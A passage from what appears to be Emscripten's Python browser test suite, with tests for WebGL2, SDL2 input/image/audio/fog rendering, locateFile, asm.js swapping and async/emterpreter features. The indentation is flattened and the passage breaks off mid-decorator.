self.btest(path_from_root('tests', 'webgl2_backwards_compatibility_emulation.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-s', 'WEBGL2_BACKWARDS_COMPATIBILITY_EMULATION=1'], expected='0')
@requires_graphics_hardware
def test_webgl2_invalid_teximage2d_type(self):
self.btest(path_from_root('tests', 'webgl2_invalid_teximage2d_type.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2'], expected='0')
@requires_graphics_hardware
def test_webgl_with_closure(self):
self.btest(path_from_root('tests', 'webgl_with_closure.cpp'), args=['-O2', '-s', 'MAX_WEBGL_VERSION=2', '--closure', '1', '-lGL'], expected='0')
  # Tests that -s GL_ASSERTIONS=1 and glVertexAttribPointer with packed types work together
@requires_graphics_hardware
def test_webgl2_packed_types(self):
self.btest(path_from_root('tests', 'webgl2_draw_packed_triangle.c'), args=['-lGL', '-s', 'MAX_WEBGL_VERSION=2', '-s', 'GL_ASSERTIONS=1'], expected='0')
@requires_graphics_hardware
def test_webgl2_pbo(self):
self.btest(path_from_root('tests', 'webgl2_pbo.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
def test_sdl_touch(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'sdl_touch.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_html5_mouse(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'test_html5_mouse.c'), args=opts + ['-DAUTOMATE_SUCCESS=1'], expected='0')
def test_sdl_mousewheel(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'test_sdl_mousewheel.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
@no_wasm_backend('asm.js-specific')
def test_codemods(self):
# tests asm.js client-side code modifications
for opt_level in [0, 2]:
print('opt level', opt_level)
opts = ['-O' + str(opt_level), '-s', 'WASM=0']
# sanity checks, building with and without precise float semantics generates different results
self.btest(path_from_root('tests', 'codemods.cpp'), expected='2', args=opts)
self.btest(path_from_root('tests', 'codemods.cpp'), expected='1', args=opts + ['-s', 'PRECISE_F32=1'])
self.btest(path_from_root('tests', 'codemods.cpp'), expected='1', args=opts + ['-s', 'PRECISE_F32=2', '--separate-asm']) # empty polyfill, but browser has support, so semantics are like float
def test_wget(self):
create_test_file('test.txt', 'emscripten')
self.btest(path_from_root('tests', 'test_wget.c'), expected='1', args=self.get_async_args())
def test_wget_data(self):
create_test_file('test.txt', 'emscripten')
self.btest(path_from_root('tests', 'test_wget_data.c'), expected='1', args=['-O2', '-g2'] + self.get_async_args())
# in the emterpreter, check the special assertions mode as well
if not self.is_wasm_backend():
self.btest(path_from_root('tests', 'test_wget_data.c'), expected='1', args=['-O2', '-g2', '-s', 'ASSERTIONS=1'] + self.get_async_args())
def test_locate_file(self):
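    # Module.locateFile must redirect requests for secondary files (.data, .mem, .wasm) into sub/,
    # whether it is set from a --pre-js or from the HTML shell.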
for wasm in ([0, 1] if not self.is_wasm_backend() else [1]):
print('wasm', wasm)
self.clear()
create_test_file('src.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
int main() {
FILE *f = fopen("data.txt", "r");
assert(f && "could not open file");
char buf[100];
int num = fread(buf, 1, 20, f);
assert(num == 20 && "could not read 20 bytes");
buf[20] = 0;
fclose(f);
int result = !strcmp("load me right before", buf);
printf("|%s| : %d\n", buf, result);
REPORT_RESULT(result);
return 0;
}
'''))
create_test_file('data.txt', 'load me right before...')
create_test_file('pre.js', 'Module.locateFile = function(x) { return "sub/" + x };')
run_process([PYTHON, FILE_PACKAGER, 'test.data', '--preload', 'data.txt'], stdout=open('data.js', 'w'))
# put pre.js first, then the file packager data, so locateFile is there for the file loading code
self.compile_btest(['src.cpp', '-O2', '-g', '--pre-js', 'pre.js', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM=1', '-s', 'WASM=' + str(wasm)])
ensure_dir('sub')
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
shutil.move('test.data', os.path.join('sub', 'test.data'))
self.run_browser('page.html', None, '/report_result?1')
# alternatively, put locateFile in the HTML
print('in html')
create_test_file('shell.html', '''
<body>
<script>
var Module = {
locateFile: function(x) { return "sub/" + x }
};
</script>
{{{ SCRIPT }}}
</body>
''')
def in_html(expected, args=[]):
self.compile_btest(['src.cpp', '-O2', '-g', '--shell-file', 'shell.html', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'SAFE_HEAP=1', '-s', 'ASSERTIONS=1', '-s', 'FORCE_FILESYSTEM=1', '-s', 'WASM=' + str(wasm)] + args)
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
self.run_browser('page.html', None, '/report_result?' + expected)
in_html('1')
# verify that the mem init request succeeded in the latter case
if not wasm:
create_test_file('src.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
int result = EM_ASM_INT({
return Module['memoryInitializerRequest'].status;
});
printf("memory init request: %d\n", result);
REPORT_RESULT(result);
return 0;
}
'''))
in_html('200')
@requires_graphics_hardware
def test_glfw3(self):
for opts in [[], ['-s', 'LEGACY_GL_EMULATION=1'], ['-Os', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'glfw3.c'), args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'] + opts, expected='1')
@requires_graphics_hardware
def test_glfw_events(self):
self.btest(path_from_root('tests', 'glfw_events.c'), args=['-s', 'USE_GLFW=2', "-DUSE_GLFW=2", '-lglfw', '-lGL'], expected='1')
self.btest(path_from_root('tests', 'glfw_events.c'), args=['-s', 'USE_GLFW=3', "-DUSE_GLFW=3", '-lglfw', '-lGL'], expected='1')
@no_wasm_backend('asm.js')
def test_asm_swapping(self):
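    # build a swappable main module plus a second module distilled into second.js, then verify that
    # run.js can swap the second asm.js module in at runtime (the swapped-in code reports 999)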
self.clear()
create_test_file('run.js', r'''
Module['onRuntimeInitialized'] = function() {
// test proper initial result
var result = Module._func();
console.log('first: ' + result);
if (result !== 10) throw 'bad first result';
// load second module to be swapped in
var second = document.createElement('script');
second.onload = function() { console.log('loaded second') };
second.src = 'second.js';
document.body.appendChild(second);
console.log('second appended');
Module['onAsmSwap'] = function() {
console.log('swapped');
// verify swapped-in result
var result = Module._func();
console.log('second: ' + result);
if (result !== 22) throw 'bad second result';
Module._report(999);
console.log('reported');
};
};
''')
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2']]:
print(opts)
opts += ['-s', 'WASM=0', '--pre-js', 'run.js', '-s', 'SWAPPABLE_ASM_MODULE=1'] # important that both modules are built with the same opts
create_test_file('second.cpp', self.with_report_result(open(path_from_root('tests', 'asm_swap2.cpp')).read()))
self.compile_btest(['second.cpp'] + opts)
run_process([PYTHON, path_from_root('tools', 'distill_asm.py'), 'a.out.js', 'second.js', 'swap-in'])
self.assertExists('second.js')
if SPIDERMONKEY_ENGINE in JS_ENGINES:
out = run_js('second.js', engine=SPIDERMONKEY_ENGINE, stderr=PIPE, full_output=True, assert_returncode=None)
self.validate_asmjs(out)
else:
print('Skipping asm validation check, spidermonkey is not configured')
self.btest(path_from_root('tests', 'asm_swap.cpp'), args=opts, expected='999')
@requires_graphics_hardware
def test_sdl2_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
create_test_file('sdl2_image.c', self.with_report_result(open(path_from_root('tests', 'sdl2_image.c')).read()))
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
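        # cover both preloading into the root and remapping the file into /assets via the src@dst syntax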
self.compile_btest([
'sdl2_image.c', '-o', 'page.html', '-O2', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_jpeg(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpeg')
create_test_file('sdl2_image_jpeg.c', self.with_report_result(open(path_from_root('tests', 'sdl2_image.c')).read()))
self.compile_btest([
'sdl2_image_jpeg.c', '-o', 'page.html',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_formats(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl2_image.c', expected='512', args=['--preload-file', 'screenshot.png', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.png"',
'-DNO_PRELOADED', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["png"]'])
self.btest('sdl2_image.c', expected='600', args=['--preload-file', 'screenshot.jpg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpg"',
'-DBITSPERPIXEL=24', '-DNO_PRELOADED', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["jpg"]'])
def test_sdl2_key(self):
for defines in [[]]:
create_test_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
var prevented = !document.dispatchEvent(event);
//send keypress if not prevented
if (!prevented) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
create_test_file('sdl2_key.c', self.with_report_result(open(path_from_root('tests', 'sdl2_key.c')).read()))
self.compile_btest(['sdl2_key.c', '-o', 'page.html'] + defines + ['-s', 'USE_SDL=2', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']'''])
self.run_browser('page.html', '', '/report_result?37182145')
def test_sdl2_text(self):
create_test_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
create_test_file('sdl2_text.c', self.with_report_result(open(path_from_root('tests', 'sdl2_text.c')).read()))
self.compile_btest(['sdl2_text.c', '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_test_file('sdl2_mouse.c', self.with_report_result(open(path_from_root('tests', 'sdl2_mouse.c')).read()))
self.compile_btest(['sdl2_mouse.c', '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse_offsets(self):
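    # unlike test_sdl2_mouse above, events are dispatched with raw page coordinates while the canvas is
    # offset via CSS in the custom page.html, presumably to exercise SDL2's page-to-canvas coordinate
    # translation (enabled by -DTEST_SDL_MOUSE_OFFSETS)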
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_test_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl2_mouse.js"></script>
</body>
</html>
''')
create_test_file('sdl2_mouse.c', self.with_report_result(open(path_from_root('tests', 'sdl2_mouse.c')).read()))
self.compile_btest(['sdl2_mouse.c', '-DTEST_SDL_MOUSE_OFFSETS=1', '-O2', '--minify', '0', '-o', 'sdl2_mouse.js', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_threads
def test_sdl2_threads(self):
self.btest('sdl2_threads.c', expected='4', args=['-s', 'USE_PTHREADS=1', '-s', 'USE_SDL=2', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_graphics_hardware
def test_sdl2glshader(self):
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '--closure', '1', '-g1', '-s', 'LEGACY_GL_EMULATION=1'])
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '-s', 'LEGACY_GL_EMULATION=1'], also_proxied=True) # XXX closure fails on proxy
@requires_graphics_hardware
def test_sdl2_canvas_blank(self):
self.btest('sdl2_canvas_blank.c', reference='sdl_canvas_blank.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_palette(self):
self.btest('sdl2_canvas_palette.c', reference='sdl_canvas_palette.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_twice(self):
self.btest('sdl2_canvas_twice.c', reference='sdl_canvas_twice.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gfx(self):
self.btest('sdl2_gfx.cpp', args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_GFX=2'], reference='sdl2_gfx.png', reference_slack=2)
@requires_graphics_hardware
def test_sdl2_canvas_palette_2(self):
create_test_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_test_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_test_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-r.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-g.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-b.js'])
def test_sdl2_swsurface(self):
self.btest('sdl2_swsurface.c', expected='1', args=['-s', 'USE_SDL=2', '-s', 'TOTAL_MEMORY=64MB'])
@requires_graphics_hardware
def test_sdl2_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_canvas_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
create_test_file('test.html', html)
create_test_file('data.txt', 'datum')
self.btest('sdl2_canvas_proxy.c', reference='sdl2_canvas.png', args=['-s', 'USE_SDL=2', '--proxy-to-worker', '--preload-file', 'data.txt', '-s', 'GL_TESTING=1'], manual_reference=True, post_build=post)
def test_sdl2_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_test_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest('sdl2_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
def test_sdl2_timer(self):
self.btest('sdl2_timer.c', expected='5', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_size(self):
self.btest('sdl2_canvas_size.c', expected='1', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_read(self):
# SDL, OpenGL, readPixels
create_test_file('sdl2_gl_read.c', self.with_report_result(open(path_from_root('tests', 'sdl2_gl_read.c')).read()))
self.compile_btest(['sdl2_gl_read.c', '-o', 'something.html', '-s', 'USE_SDL=2'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_fog_simple(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_negative(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_negative.c', reference='screenshot-fog-negative.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_density(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_density.c', reference='screenshot-fog-density.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_exp2(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_linear(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl2_unwasteful(self):
self.btest('sdl2_unwasteful.cpp', expected='1', args=['-s', 'USE_SDL=2', '-O1'])
def test_sdl2_canvas_write(self):
self.btest('sdl2_canvas_write.cpp', expected='0', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_frames_swap(self):
def post_build(*args):
self.post_manual_reftest(*args)
html = open('test.html').read()
html2 = html.replace('''Module['postRun'] = doReftest;''', '') # we don't want the very first frame
assert html != html2
create_test_file('test.html', html2)
self.btest('sdl2_gl_frames_swap.c', reference='sdl2_gl_frames_swap.png', args=['--proxy-to-worker', '-s', 'GL_TESTING=1', '-s', 'USE_SDL=2'], manual_reference=True, post_build=post_build)
@requires_graphics_hardware
def test_sdl2_ttf(self):
shutil.copy2(path_from_root('tests', 'freetype', 'LiberationSansBold.ttf'), self.get_dir())
self.btest('sdl2_ttf.c', reference='sdl2_ttf.png',
args=['-O2', '-s', 'USE_SDL=2', '-s', 'USE_SDL_TTF=2', '--embed-file', 'LiberationSansBold.ttf'],
message='You should see colorful "hello" and "world" in the window')
def test_sdl2_custom_cursor(self):
shutil.copyfile(path_from_root('tests', 'cursor.bmp'), 'cursor.bmp')
self.btest('sdl2_custom_cursor.c', expected='1', args=['--preload-file', 'cursor.bmp', '-s', 'USE_SDL=2'])
def test_sdl2_misc(self):
self.btest('sdl2_misc.c', expected='1', args=['-s', 'USE_SDL=2'])
print('also test building to object files first')
src = open(path_from_root('tests', 'sdl2_misc.c')).read()
create_test_file('test.c', self.with_report_result(src))
run_process([PYTHON, EMCC, 'test.c', '-s', 'USE_SDL=2', '-o', 'test.o'])
self.compile_btest(['test.o', '-s', 'USE_SDL=2', '-o', 'test.html'])
self.run_browser('test.html', '...', '/report_result?1')
@requires_sound_hardware
def test_sdl2_mixer(self):
shutil.copyfile(path_from_root('tests', 'sounds', 'alarmvictory_1.ogg'), 'sound.ogg')
self.btest('sdl2_mixer.c', expected='1', args=['--preload-file', 'sound.ogg', '-s', 'USE_SDL=2', '-s', 'USE_SDL_MIXER=2', '-s', 'TOTAL_MEMORY=33554432'])
@requires_sound_hardware
def test_sdl2_mixer_wav(self):
shutil.copyfile(path_from_root('tests', 'sounds', 'the_entertainer.wav'), 'sound.wav')
self.btest('sdl2_mixer_wav.c', expected='1', args=['--preload-file', 'sound.wav', '-s', 'USE_SDL=2', '-s', 'USE_SDL_MIXER=2', '-s', 'TOTAL_MEMORY=33554432'])
@no_wasm_backend('cocos2d needs to be ported')
@requires_graphics_hardware
def test_cocos2d_hello(self):
cocos2d_root = os.path.join(system_libs.Ports.get_build_dir(), 'cocos2d')
preload_file = os.path.join(cocos2d_root, 'samples', 'HelloCpp', 'Resources') + '@'
self.btest('cocos2d_hello.cpp', reference='cocos2d_hello.png', reference_slack=1,
args=['-s', 'USE_COCOS2D=3', '-s', 'ERROR_ON_UNDEFINED_SYMBOLS=0', '--std=c++11',
'--preload-file', preload_file, '--use-preload-plugins',
'-Wno-inconsistent-missing-override'],
message='You should see Cocos2d logo')
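# Basic async pause/resume test across optimization levels; get_async_args()
# supplies the async transform flags for the current backend (presumably
# Emterpreter on fastcomp, Asyncify on the wasm backend).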
def test_async(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('browser/async.cpp', '1', args=['-O' + str(opts), '-g2'] + self.get_async_args())
@no_fastcomp('emterpretify is not compatible with threads')
@requires_threads
def test_async_in_pthread(self):
self.btest('browser/async.cpp', '1', args=self.get_async_args() + ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-g'])
def test_async_2(self):
# Error.stackTraceLimit defaults to 10 in Chrome, but this test relies on more
# than 40 stack frames being reported.
create_test_file('pre.js', 'Error.stackTraceLimit = 80;\n')
self.btest('browser/async_2.cpp', '40', args=['-O3', '--pre-js', 'pre.js'] + self.get_async_args())
def test_async_virtual(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_virtual.cpp', '5', args=['-O' + str(opts), '-profiling'] + self.get_async_args())
def test_async_virtual_2(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_virtual_2.cpp', '1', args=['-O' + str(opts), '-s', 'ASSERTIONS=1', '-s', 'SAFE_HEAP=1', '-profiling'] + self.get_async_args())
# Test async sleeps in the presence of invoke_* calls, which can happen with
# longjmp or exceptions.
@parameterized({
'O0': ([],), # noqa
'O3': (['-O3'],), # noqa
})
def test_async_longjmp(self, args):
self.btest('browser/async_longjmp.cpp', '2', args=args + self.get_async_args())
@no_wasm_backend('emterpretify, with emterpreter-specific error logging')
def test_emterpreter_async_bad(self):
for opts in [0, 3]:
print(opts)
self.btest('emterpreter_async_bad.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'EMTERPRETIFY_BLACKLIST=["_middle"]', '-s', 'ASSERTIONS=1'])
@no_wasm_backend('emterpretify, with emterpreter-specific error logging')
def test_emterpreter_async_bad_2(self):
for opts in [0, 3]:
for assertions in [0, 1]:
# without assertions, we end up continuing to run more non-emterpreted code in this testcase, returning 1
# with assertions, we hit the emterpreter-async assertion on that, and report a clear error
expected = '2' if assertions else '1'
print(opts, assertions, expected)
self.btest('emterpreter_async_bad_2.cpp', expected, args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'EMTERPRETIFY_BLACKLIST=["_middle"]', '-s', 'ASSERTIONS=%s' % assertions, '-g'])
def test_async_mainloop(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_mainloop.cpp', '121', args=['-O' + str(opts)] + self.get_async_args())
@no_wasm_backend('emterpretify - specific behavior wrt other async calls being paused or not')
def test_emterpreter_async_with_manual(self):
for opts in [0, 3]:
print(opts)
self.btest('emterpreter_async_with_manual.cpp', '121', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'EMTERPRETIFY_BLACKLIST=["_acall"]'])
@no_wasm_backend('emterpretify - yielding behavior')
def test_emterpreter_async_sleep2(self):
self.btest('emterpreter_async_sleep2.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Oz'])
@no_wasm_backend('emterpretify - safe-heap specific issues')
def test_emterpreter_async_sleep2_safeheap(self):
# check that safe-heap machinery does not cause errors in async operations
self.btest('emterpreter_async_sleep2_safeheap.cpp', '17', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Oz', '-profiling', '-s', 'SAFE_HEAP=1', '-s', 'ASSERTIONS=1', '-s', 'EMTERPRETIFY_WHITELIST=["_main","_callback","_fix"]', '-s', 'EXIT_RUNTIME=1'])
@requires_sound_hardware
def test_sdl_audio_beep_sleep(self):
self.btest('sdl_audio_beep_sleep.cpp', '1', args=['-Os', '-s', 'ASSERTIONS=1', '-s', 'DISABLE_EXCEPTION_CATCHING=0', '-profiling', '-s', 'SAFE_HEAP=1', '-lSDL'] + self.get_async_args(), timeout=90)
def test_mainloop_reschedule(self):
self.btest('mainloop_reschedule.cpp', '1', args=['-Os'] + self.get_async_args())
def test_mainloop_infloop(self):
self.btest('mainloop_infloop.cpp', '1', args=self.get_async_args())
def test_async_iostream(self):
self.btest('browser/async_iostream.cpp', '1', args=self.get_async_args())
# Test an async return value. The value goes through a custom JS library
# method that uses asyncify, and therefore it needs to be declared in
# ASYNCIFY_IMPORTS.
# To make the test more precise we also use ASYNCIFY_IGNORE_INDIRECT here.
@parameterized({
'normal': (['-s', 'ASYNCIFY_IMPORTS=["sync_tunnel"]'],), # noqa
'response': (['-s', 'ASYNCIFY_IMPORTS=@filey.txt'],), # noqa
'nothing': (['-DBAD'],), # noqa
